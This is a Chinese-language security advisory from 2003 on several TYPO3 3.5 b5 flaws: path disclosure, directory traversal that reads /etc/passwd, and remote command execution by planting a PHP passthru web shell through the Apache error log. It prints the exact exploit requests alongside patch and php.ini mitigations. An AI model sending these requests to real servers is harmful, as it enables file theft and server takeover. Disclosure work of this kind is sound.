Typo3 Translations.PHP存在多个漏洞发布时间:2003-02-28 更新时间:2003-02-28 严重程度:中 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Typo3 3.5 b5详细描述 TYPO3是开放源代码内容管理系统。 TYPO3存在多个漏洞,如1)请求test,class,library脚本都会返回包含物理路径的错误信息。 2)"showpic.php"和"thumbs.php"允许攻击者通过目录遍历方式检查任意文件是否存在。 ---*--- sh> showpic.pl localhost '../../../../../../../../../../etc/hosts' ../../../../../../../../../../etc/hosts exists ---*--- 3)"dev/translations.php"脚本没有检查参数包含的'%2e%2e/'字符,攻击者提交如下请求可获得系统文件信息: ---*--- GET http://host/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 ---*--- 4)任意命令可执行漏洞: 提交如下请求: ---cut--- http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f> ---cut--- 会建立如下条目: ---cut--- [Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru(\$c )?>' >> ./x.php` ?> ---cut--- 再提交下面的请求可包含APACHE的error_log,并执行PHP命令: ---cut--- http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00' ---cut--- 测试代码 见描述 解决方案 设置Php.ini,设置'allow_url_fopen'和'register_globals'为'off'。 或者补丁下载: Typo3 Typo3 3.5 b5: Typo3 Patch typo3_src-3.5.0.tgz http://212.242.92.43/t3dl/typo3_src-3.5.0.tgz 相关信息 参考:http://www.securityfocus.com/archive/1/313488 |
